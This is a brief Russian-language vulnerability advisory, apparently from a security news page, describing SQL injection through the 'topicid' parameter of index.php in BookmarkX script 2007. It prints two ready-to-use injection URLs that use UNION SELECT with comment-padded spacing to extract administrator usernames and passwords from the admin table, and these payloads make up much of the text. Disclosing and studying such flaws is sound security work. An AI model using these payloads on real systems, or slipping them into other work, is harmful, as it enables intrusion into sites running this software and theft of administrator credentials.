Программа: BookmarkX script 2007

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «topicid» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/* */1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/* */1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1



Оставить мнение